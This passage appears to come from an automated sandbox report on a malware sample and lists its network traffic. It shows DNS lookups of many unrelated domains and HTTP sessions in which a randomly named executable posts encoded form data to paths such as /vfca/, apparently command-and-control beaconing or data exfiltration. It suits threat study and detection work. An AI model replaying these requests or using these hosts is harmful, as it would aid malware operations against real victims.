Jul 3, 2024 08:36:58.565623045 CEST	80	61468	208.91.197.27	192.168.2.8
Jul 3, 2024 08:36:58.566926956 CEST	80	61468	208.91.197.27	192.168.2.8
Jul 3, 2024 08:37:00.060851097 CEST	61468	80	192.168.2.8	208.91.197.27
Jul 3, 2024 08:37:00.107808113 CEST	80	61468	208.91.197.27	192.168.2.8
Jul 3, 2024 08:37:01.079267025 CEST	61469	80	192.168.2.8	208.91.197.27
Jul 3, 2024 08:37:01.085812092 CEST	80	61469	208.91.197.27	192.168.2.8
Jul 3, 2024 08:37:01.085900068 CEST	61469	80	192.168.2.8	208.91.197.27
Jul 3, 2024 08:37:01.089768887 CEST	61469	80	192.168.2.8	208.91.197.27
Jul 3, 2024 08:37:01.095577955 CEST	80	61469	208.91.197.27	192.168.2.8
Jul 3, 2024 08:37:02.847831011 CEST	80	61466	208.91.197.27	192.168.2.8
Jul 3, 2024 08:37:02.847995043 CEST	61466	80	192.168.2.8	208.91.197.27
Jul 3, 2024 08:37:05.391622066 CEST	80	61469	208.91.197.27	192.168.2.8
Jul 3, 2024 08:37:05.391647100 CEST	80	61469	208.91.197.27	192.168.2.8
Jul 3, 2024 08:37:05.391660929 CEST	80	61469	208.91.197.27	192.168.2.8
Jul 3, 2024 08:37:05.391721010 CEST	80	61469	208.91.197.27	192.168.2.8
Jul 3, 2024 08:37:05.391731977 CEST	80	61469	208.91.197.27	192.168.2.8
Jul 3, 2024 08:37:05.391784906 CEST	61469	80	192.168.2.8	208.91.197.27
Jul 3, 2024 08:37:05.391839027 CEST	61469	80	192.168.2.8	208.91.197.27
Jul 3, 2024 08:37:05.395942926 CEST	80	61467	208.91.197.27	192.168.2.8
Jul 3, 2024 08:37:05.395986080 CEST	61467	80	192.168.2.8	208.91.197.27
Jul 3, 2024 08:37:05.396704912 CEST	61469	80	192.168.2.8	208.91.197.27
Jul 3, 2024 08:37:05.401535988 CEST	80	61469	208.91.197.27	192.168.2.8
Jul 3, 2024 08:37:07.943602085 CEST	80	61468	208.91.197.27	192.168.2.8
Jul 3, 2024 08:37:07.943664074 CEST	61468	80	192.168.2.8	208.91.197.27
Jul 3, 2024 08:37:10.459084034 CEST	61470	80	192.168.2.8	66.235.200.146
Jul 3, 2024 08:37:10.463903904 CEST	80	61470	66.235.200.146	192.168.2.8
Jul 3, 2024 08:37:10.466625929 CEST	61470	80	192.168.2.8	66.235.200.146
Jul 3, 2024 08:37:10.466625929 CEST	61470	80	192.168.2.8	66.235.200.146
Jul 3, 2024 08:37:10.471467018 CEST	80	61470	66.235.200.146	192.168.2.8
Jul 3, 2024 08:37:11.159235954 CEST	80	61470	66.235.200.146	192.168.2.8
Jul 3, 2024 08:37:11.159255028 CEST	80	61470	66.235.200.146	192.168.2.8
Jul 3, 2024 08:37:11.159452915 CEST	80	61470	66.235.200.146	192.168.2.8
Jul 3, 2024 08:37:11.159482002 CEST	61470	80	192.168.2.8	66.235.200.146
Jul 3, 2024 08:37:11.160943031 CEST	61470	80	192.168.2.8	66.235.200.146
Jul 3, 2024 08:37:12.701478004 CEST	61470	80	192.168.2.8	66.235.200.146
Jul 3, 2024 08:37:13.719528913 CEST	61471	80	192.168.2.8	66.235.200.146
Jul 3, 2024 08:37:13.724569082 CEST	80	61471	66.235.200.146	192.168.2.8
Jul 3, 2024 08:37:13.724806070 CEST	61471	80	192.168.2.8	66.235.200.146
Jul 3, 2024 08:37:13.726578951 CEST	61471	80	192.168.2.8	66.235.200.146
Jul 3, 2024 08:37:13.731705904 CEST	80	61471	66.235.200.146	192.168.2.8
Jul 3, 2024 08:37:14.407061100 CEST	80	61471	66.235.200.146	192.168.2.8
Jul 3, 2024 08:37:14.407605886 CEST	80	61471	66.235.200.146	192.168.2.8
Jul 3, 2024 08:37:14.407618999 CEST	80	61471	66.235.200.146	192.168.2.8
Jul 3, 2024 08:37:14.407679081 CEST	61471	80	192.168.2.8	66.235.200.146

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 3, 2024 08:33:37.677660942 CEST	53	57573	162.159.36.2	192.168.2.8
Jul 3, 2024 08:33:38.184720039 CEST	64503	53	192.168.2.8	1.1.1.1
Jul 3, 2024 08:33:38.204902887 CEST	53	64503	1.1.1.1	192.168.2.8
Jul 3, 2024 08:33:40.041443110 CEST	60884	53	192.168.2.8	1.1.1.1
Jul 3, 2024 08:33:40.549526930 CEST	53	60884	1.1.1.1	192.168.2.8
Jul 3, 2024 08:33:56.126867056 CEST	63802	53	192.168.2.8	1.1.1.1
Jul 3, 2024 08:33:56.139097929 CEST	53	63802	1.1.1.1	192.168.2.8
Jul 3, 2024 08:34:30.157926083 CEST	54160	53	192.168.2.8	1.1.1.1
Jul 3, 2024 08:34:30.378868103 CEST	53	54160	1.1.1.1	192.168.2.8
Jul 3, 2024 08:34:43.861346960 CEST	64367	53	192.168.2.8	1.1.1.1
Jul 3, 2024 08:34:43.944588900 CEST	53	64367	1.1.1.1	192.168.2.8
Jul 3, 2024 08:34:52.003401041 CEST	52163	53	192.168.2.8	1.1.1.1
Jul 3, 2024 08:34:52.013887882 CEST	53	52163	1.1.1.1	192.168.2.8
Jul 3, 2024 08:35:06.128607988 CEST	63949	53	192.168.2.8	1.1.1.1
Jul 3, 2024 08:35:06.138662100 CEST	53	63949	1.1.1.1	192.168.2.8
Jul 3, 2024 08:35:14.282948971 CEST	63259	53	192.168.2.8	1.1.1.1
Jul 3, 2024 08:35:14.443124056 CEST	53	63259	1.1.1.1	192.168.2.8
Jul 3, 2024 08:35:28.065064907 CEST	64925	53	192.168.2.8	1.1.1.1
Jul 3, 2024 08:35:28.097534895 CEST	53	64925	1.1.1.1	192.168.2.8
Jul 3, 2024 08:35:36.158504963 CEST	62459	53	192.168.2.8	1.1.1.1
Jul 3, 2024 08:35:36.226030111 CEST	53	62459	1.1.1.1	192.168.2.8
Jul 3, 2024 08:35:50.610807896 CEST	64458	53	192.168.2.8	1.1.1.1
Jul 3, 2024 08:35:50.751796961 CEST	53	64458	1.1.1.1	192.168.2.8
Jul 3, 2024 08:36:04.010092974 CEST	55449	53	192.168.2.8	1.1.1.1
Jul 3, 2024 08:36:04.299319983 CEST	53	55449	1.1.1.1	192.168.2.8
Jul 3, 2024 08:36:17.595724106 CEST	55189	53	192.168.2.8	1.1.1.1
Jul 3, 2024 08:36:17.623256922 CEST	53	55189	1.1.1.1	192.168.2.8
Jul 3, 2024 08:36:31.068711996 CEST	49760	53	192.168.2.8	1.1.1.1
Jul 3, 2024 08:36:31.108305931 CEST	53	49760	1.1.1.1	192.168.2.8
Jul 3, 2024 08:36:39.176702976 CEST	55860	53	192.168.2.8	1.1.1.1
Jul 3, 2024 08:36:39.724183083 CEST	53	55860	1.1.1.1	192.168.2.8
Jul 3, 2024 08:36:53.252728939 CEST	49495	53	192.168.2.8	1.1.1.1
Jul 3, 2024 08:36:53.474770069 CEST	53	49495	1.1.1.1	192.168.2.8
Jul 3, 2024 08:37:10.408833981 CEST	62917	53	192.168.2.8	1.1.1.1
Jul 3, 2024 08:37:10.453088999 CEST	53	62917	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 3, 2024 08:33:38.184720039 CEST	192.168.2.8	1.1.1.1	0x28fe	Standard query (0)	56.126.166.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Jul 3, 2024 08:33:40.041443110 CEST	192.168.2.8	1.1.1.1	0x5510	Standard query (0)	www.highwavesmarine.com	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:33:56.126867056 CEST	192.168.2.8	1.1.1.1	0xdded	Standard query (0)	www.dxgsf.shop	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:34:30.157926083 CEST	192.168.2.8	1.1.1.1	0x643f	Standard query (0)	www.dennisrosenberg.studio	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:34:43.861346960 CEST	192.168.2.8	1.1.1.1	0xc6f7	Standard query (0)	www.shoplifestylebrand.com	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:34:52.003401041 CEST	192.168.2.8	1.1.1.1	0xa8c7	Standard query (0)	www.ennerdaledevcons.co.uk	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:35:06.128607988 CEST	192.168.2.8	1.1.1.1	0x38b4	Standard query (0)	www.neworldelectronic.com	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:35:14.282948971 CEST	192.168.2.8	1.1.1.1	0xcb2f	Standard query (0)	www.artemhypnotherapy.com	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:35:28.065064907 CEST	192.168.2.8	1.1.1.1	0xf1b5	Standard query (0)	www.todosneaker.com	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:35:36.158504963 CEST	192.168.2.8	1.1.1.1	0x9941	Standard query (0)	www.mocar.pro	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:35:50.610807896 CEST	192.168.2.8	1.1.1.1	0x5cea	Standard query (0)	www.evertudy.xyz	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:36:04.010092974 CEST	192.168.2.8	1.1.1.1	0x2037	Standard query (0)	www.luo918.com	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:36:17.595724106 CEST	192.168.2.8	1.1.1.1	0xfb03	Standard query (0)	www.fungusbus.com	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:36:31.068711996 CEST	192.168.2.8	1.1.1.1	0x53bf	Standard query (0)	www.newzionocala.com	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:36:39.176702976 CEST	192.168.2.8	1.1.1.1	0xa795	Standard query (0)	www.qe1jqiste.sbs	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:36:53.252728939 CEST	192.168.2.8	1.1.1.1	0xfe99	Standard query (0)	www.thesprinklesontop.com	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:37:10.408833981 CEST	192.168.2.8	1.1.1.1	0x849f	Standard query (0)	www.stefanogaus.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 3, 2024 08:33:38.204902887 CEST	1.1.1.1	192.168.2.8	0x28fe	Name error (3)	56.126.166.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Jul 3, 2024 08:33:40.549526930 CEST	1.1.1.1	192.168.2.8	0x5510	No error (0)	www.highwavesmarine.com		23.111.180.146	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:33:56.139097929 CEST	1.1.1.1	192.168.2.8	0xdded	No error (0)	www.dxgsf.shop	dxgsf.shop		CNAME (Canonical name)	IN (0x0001)	false
Jul 3, 2024 08:33:56.139097929 CEST	1.1.1.1	192.168.2.8	0xdded	No error (0)	dxgsf.shop		103.197.25.241	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:34:30.378868103 CEST	1.1.1.1	192.168.2.8	0x643f	No error (0)	www.dennisrosenberg.studio	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 3, 2024 08:34:30.378868103 CEST	1.1.1.1	192.168.2.8	0x643f	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:34:43.944588900 CEST	1.1.1.1	192.168.2.8	0xc6f7	Name error (3)	www.shoplifestylebrand.com	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:34:52.013887882 CEST	1.1.1.1	192.168.2.8	0xa8c7	No error (0)	www.ennerdaledevcons.co.uk		212.227.172.254	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:35:06.138662100 CEST	1.1.1.1	192.168.2.8	0x38b4	Name error (3)	www.neworldelectronic.com	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:35:14.443124056 CEST	1.1.1.1	192.168.2.8	0xcb2f	No error (0)	www.artemhypnotherapy.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 3, 2024 08:35:14.443124056 CEST	1.1.1.1	192.168.2.8	0xcb2f	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:35:28.097534895 CEST	1.1.1.1	192.168.2.8	0xf1b5	Name error (3)	www.todosneaker.com	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:35:36.226030111 CEST	1.1.1.1	192.168.2.8	0x9941	No error (0)	www.mocar.pro	mocar.pro		CNAME (Canonical name)	IN (0x0001)	false
Jul 3, 2024 08:35:36.226030111 CEST	1.1.1.1	192.168.2.8	0x9941	No error (0)	mocar.pro		109.95.158.122	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:35:50.751796961 CEST	1.1.1.1	192.168.2.8	0x5cea	No error (0)	www.evertudy.xyz		203.161.49.220	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:36:04.299319983 CEST	1.1.1.1	192.168.2.8	0x2037	No error (0)	www.luo918.com		35.227.248.111	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:36:17.623256922 CEST	1.1.1.1	192.168.2.8	0xfb03	No error (0)	www.fungusbus.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 3, 2024 08:36:17.623256922 CEST	1.1.1.1	192.168.2.8	0xfb03	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:36:31.108305931 CEST	1.1.1.1	192.168.2.8	0x53bf	Name error (3)	www.newzionocala.com	none	none	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:36:39.724183083 CEST	1.1.1.1	192.168.2.8	0xa795	No error (0)	www.qe1jqiste.sbs	xiaoyue.zhuangkou.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 3, 2024 08:36:39.724183083 CEST	1.1.1.1	192.168.2.8	0xa795	No error (0)	xiaoyue.zhuangkou.com		47.239.13.172	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:36:53.474770069 CEST	1.1.1.1	192.168.2.8	0xfe99	No error (0)	www.thesprinklesontop.com		208.91.197.27	A (IP address)	IN (0x0001)	false
Jul 3, 2024 08:37:10.453088999 CEST	1.1.1.1	192.168.2.8	0x849f	No error (0)	www.stefanogaus.com	stefanogaus.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 3, 2024 08:37:10.453088999 CEST	1.1.1.1	192.168.2.8	0x849f	No error (0)	stefanogaus.com		66.235.200.146	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.highwavesmarine.com

www.dxgsf.shop

www.dennisrosenberg.studio

www.ennerdaledevcons.co.uk

www.artemhypnotherapy.com

www.mocar.pro

www.evertudy.xyz

www.luo918.com

www.fungusbus.com

www.qe1jqiste.sbs

www.thesprinklesontop.com

www.stefanogaus.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	61426	23.111.180.146	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:33:40.563093901 CEST	486	OUT	GET /vpfr/?eZ=3HYLM&iJiX_=YJOYlkuNdHbUbxIU0duDsGwGBWmXVvvP+a5ZIsJaJ66fRzvfH4BZf/UT7tP0StNW9dLVB8Be+XMnEr4f4IOQp0lsgtKVk15wNPoNEOoMMjyN3LU6dxhHI1FgmxIsamdstg== HTTP/1.1 Host: www.highwavesmarine.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Jul 3, 2024 08:33:41.084490061 CEST	193	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Jul 2024 06:33:41 GMT Server: Apache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10File not found.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	61430	103.197.25.241	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:33:56.148224115 CEST	737	OUT	POST /vfca/ HTTP/1.1 Host: www.dxgsf.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 206 Content-Type: application/x-www-form-urlencoded Origin: http://www.dxgsf.shop Referer: http://www.dxgsf.shop/vfca/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 43 68 47 74 5a 36 31 72 50 4e 67 64 52 4c 63 4d 50 54 47 42 7a 6e 54 31 69 78 6e 6e 37 54 56 41 72 49 46 41 4c 69 6e 66 56 53 52 71 79 45 72 41 67 5a 51 49 35 78 4e 30 52 46 53 77 52 70 4b 48 5a 2f 46 42 39 2f 42 49 48 6d 65 6a 72 58 30 77 4d 35 52 73 35 52 31 63 67 4e 37 70 72 71 74 69 7a 2b 6d 6b 62 74 54 50 75 4a 50 51 73 75 79 4a 67 30 34 52 34 78 43 50 35 62 4f 70 65 74 46 36 34 6b 37 47 72 42 47 33 6d 65 37 61 58 65 48 52 50 44 4e 77 59 73 48 33 39 6b 61 4c 6f 39 76 6a 37 41 76 77 43 45 76 2f 56 76 58 73 59 59 48 7a 6f 64 2b 63 78 67 76 57 62 37 32 68 53 30 49 64 71 34 2f 6d 66 54 4d 3d Data Ascii: iJiX_=ChGtZ61rPNgdRLcMPTGBznT1ixnn7TVArIFALinfVSRqyErAgZQI5xN0RFSwRpKHZ/FB9/BIHmejrX0wM5Rs5R1cgN7prqtiz+mkbtTPuJPQsuyJg04R4xCP5bOpetF64k7GrBG3me7aXeHRPDNwYsH39kaLo9vj7AvwCEv/VvXsYYHzod+cxgvWb72hS0Idq4/mfTM=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	61431	103.197.25.241	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:33:58.690690994 CEST	757	OUT	POST /vfca/ HTTP/1.1 Host: www.dxgsf.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 226 Content-Type: application/x-www-form-urlencoded Origin: http://www.dxgsf.shop Referer: http://www.dxgsf.shop/vfca/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 43 68 47 74 5a 36 31 72 50 4e 67 64 51 6f 45 4d 4e 30 79 42 6b 33 54 32 74 52 6e 6e 68 6a 56 45 72 49 5a 41 4c 6e 65 45 41 77 46 71 79 68 58 41 68 63 77 49 30 52 4e 30 61 6c 53 35 66 4a 4c 4a 5a 2f 4a 7a 39 2b 52 49 48 69 2b 6a 72 57 45 77 4d 4f 46 72 34 42 31 6b 73 74 37 52 76 71 74 69 7a 2b 6d 6b 62 74 32 6f 75 4a 58 51 73 65 43 4a 67 51 4d 53 30 52 43 4d 75 72 4f 70 55 4e 46 32 34 6b 37 6f 72 45 75 4a 6d 63 7a 61 58 62 6a 52 49 52 6c 7a 53 73 48 35 79 45 62 66 6e 74 61 70 79 69 58 45 42 48 48 32 52 4f 6e 74 5a 75 71 5a 79 2f 32 61 79 67 48 39 62 34 65 58 58 44 56 31 77 62 76 57 42 45 5a 46 2b 77 6c 67 36 4f 61 56 39 70 38 66 4e 56 4a 54 49 46 6a 50 Data Ascii: iJiX_=ChGtZ61rPNgdQoEMN0yBk3T2tRnnhjVErIZALneEAwFqyhXAhcwI0RN0alS5fJLJZ/Jz9+RIHi+jrWEwMOFr4B1kst7Rvqtiz+mkbt2ouJXQseCJgQMS0RCMurOpUNF24k7orEuJmczaXbjRIRlzSsH5yEbfntapyiXEBHH2ROntZuqZy/2aygH9b4eXXDV1wbvWBEZF+wlg6OaV9p8fNVJTIFjP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	61432	103.197.25.241	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:34:01.227083921 CEST	1774	OUT	POST /vfca/ HTTP/1.1 Host: www.dxgsf.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 1242 Content-Type: application/x-www-form-urlencoded Origin: http://www.dxgsf.shop Referer: http://www.dxgsf.shop/vfca/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 43 68 47 74 5a 36 31 72 50 4e 67 64 51 6f 45 4d 4e 30 79 42 6b 33 54 32 74 52 6e 6e 68 6a 56 45 72 49 5a 41 4c 6e 65 45 41 77 39 71 7a 54 50 41 67 39 77 49 31 52 4e 30 47 31 53 38 66 4a 4c 45 5a 2f 68 33 39 37 49 7a 48 67 47 6a 35 41 51 77 4b 37 35 72 78 42 31 6b 69 39 37 71 72 71 74 4e 7a 34 47 67 62 74 6d 6f 75 4a 58 51 73 59 75 4a 70 6b 34 53 79 52 43 50 35 62 4f 74 65 74 45 66 34 6c 66 65 72 45 72 79 6d 6f 2f 61 53 4c 7a 52 4f 6c 46 7a 61 73 47 66 6d 6b 62 58 6e 74 47 71 79 69 62 49 42 47 7a 50 52 4a 4c 74 62 72 54 43 32 4d 43 46 68 6d 48 35 54 34 4b 2f 61 41 70 4a 37 71 4b 6a 65 46 4e 38 35 46 56 2b 79 4f 69 74 2b 37 64 31 61 55 56 65 43 67 43 43 70 6c 49 77 49 47 30 57 68 47 38 71 75 68 67 64 33 65 5a 32 50 4b 70 62 37 64 2f 4a 69 63 4f 62 6b 6e 73 48 33 4e 66 79 68 4a 4c 53 2f 49 58 33 43 75 4d 41 59 4d 4d 34 2f 58 44 34 6f 74 47 59 59 38 77 36 35 52 79 46 70 54 65 69 50 59 58 53 67 6e 37 74 32 79 4c 38 33 4f 50 4b 68 4e 47 71 2f 74 50 76 66 61 6b 47 30 78 74 46 5a 2f 6f 74 [TRUNCATED] Data Ascii: iJiX_=ChGtZ61rPNgdQoEMN0yBk3T2tRnnhjVErIZALneEAw9qzTPAg9wI1RN0G1S8fJLEZ/h397IzHgGj5AQwK75rxB1ki97qrqtNz4GgbtmouJXQsYuJpk4SyRCP5bOtetEf4lferErymo/aSLzROlFzasGfmkbXntGqyibIBGzPRJLtbrTC2MCFhmH5T4K/aApJ7qKjeFN85FV+yOit+7d1aUVeCgCCplIwIG0WhG8quhgd3eZ2PKpb7d/JicObknsH3NfyhJLS/IX3CuMAYMM4/XD4otGYY8w65RyFpTeiPYXSgn7t2yL83OPKhNGq/tPvfakG0xtFZ/oty5NjLgGix3nmuBoDlvCMwhB1WQ6yJn4upLBiMWOEFPQKByXRGY0L6mfOsXIZe+b/o2UT2AdPqUh3gan3fQtb9gyLX1xUDMaQKI+W2fBUqjXV6DV5iQ72HOFYzQ1Gi2cCV5FngR6WjSmrEtMeNFTqTYNEvxKh557z9siRH0r8A2dYJggIifoYR1VLNSJLb8hAAytjSoX6k6WB2vrHYVcyzH+2HJmA++EIu1/5ZPG1SlFjaEeGaZIeL26HFeRGvmiLispGad30RJkV80Rypo6sy9b+vewfUEcRiirTmKbg1DS7hK3VSpiz6ocaC3BUZSGXyAcQ2ZHFTgyNadPJvIpj3yXM0OGS+Ak4TLLXd/XykaubC89rj24tGvSB1uxi3POXWu6qt5K+Rgvi2LJRIGXVvnypB20/kzZYO+Jo5GfS068PLtMDyabtJAHi/iQQL1/BFnQv066Wnq6tekud3r3GgeoSgckCu+oeinximhStUT7lHgts3iGAYPAHAu7GmjE14+g3qvwg3cQUvHxfe2+VhhzmrTi7zd3YfnItzz841Co2JKCdlmEHciVuOLn424JU4cK6HmTbqc1E1Sau1bFLdH+zPu00jGyMr/rlMd4ysHWzlnPCos89JTbK+J/vewV5aJA9wbjf1KTXxMtbzk5qtphjPLMxVBx3Zq [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	61433	103.197.25.241	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:34:03.758043051 CEST	477	OUT	GET /vfca/?iJiX_=PjuNaM4rErgNDqYdGwCHqm/mvS3xhxVRtMFmVQvGZApPshrl2us8sSNvZzeSfqXaMpgL6dVjOwb89B84ObwJyCFsntjSnqpwzP+jY6yNjY7ViduojwQX6Un4yLfzesgT7A==&eZ=3HYLM HTTP/1.1 Host: www.dxgsf.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	61434	91.195.240.19	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:34:30.392509937 CEST	773	OUT	POST /gvk0/ HTTP/1.1 Host: www.dennisrosenberg.studio Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 206 Content-Type: application/x-www-form-urlencoded Origin: http://www.dennisrosenberg.studio Referer: http://www.dennisrosenberg.studio/gvk0/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 43 44 4d 66 6e 49 38 43 61 6c 7a 6f 78 6a 48 79 6a 52 64 73 74 44 7a 4b 75 47 4f 75 37 54 48 78 30 7a 70 33 58 68 68 44 59 4d 43 73 4a 33 76 49 73 70 50 74 6c 34 69 56 6d 31 37 71 71 39 4e 79 6b 4a 51 73 34 74 6d 32 35 4d 48 44 62 36 67 4d 70 71 69 4d 56 42 6a 79 70 74 76 67 77 47 6e 6e 46 65 4c 71 59 36 4f 6c 45 4f 78 42 79 7a 33 47 6c 57 4a 69 74 6f 76 62 53 51 48 61 2f 2b 4b 74 37 68 6b 7a 63 45 73 4a 38 58 76 6d 75 42 53 56 4b 54 68 69 73 49 73 59 6f 62 37 79 67 66 45 4c 43 48 6e 51 79 2b 6d 67 57 78 44 50 63 66 2f 4d 4a 61 57 39 6c 4f 67 65 45 75 4b 76 46 75 52 55 64 52 30 47 64 6b 73 3d Data Ascii: iJiX_=CDMfnI8CalzoxjHyjRdstDzKuGOu7THx0zp3XhhDYMCsJ3vIspPtl4iVm17qq9NykJQs4tm25MHDb6gMpqiMVBjyptvgwGnnFeLqY6OlEOxByz3GlWJitovbSQHa/+Kt7hkzcEsJ8XvmuBSVKThisIsYob7ygfELCHnQy+mgWxDPcf/MJaW9lOgeEuKvFuRUdR0Gdks=
Jul 3, 2024 08:34:31.062623978 CEST	305	IN	HTTP/1.1 405 Not Allowed date: Wed, 03 Jul 2024 06:34:30 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not 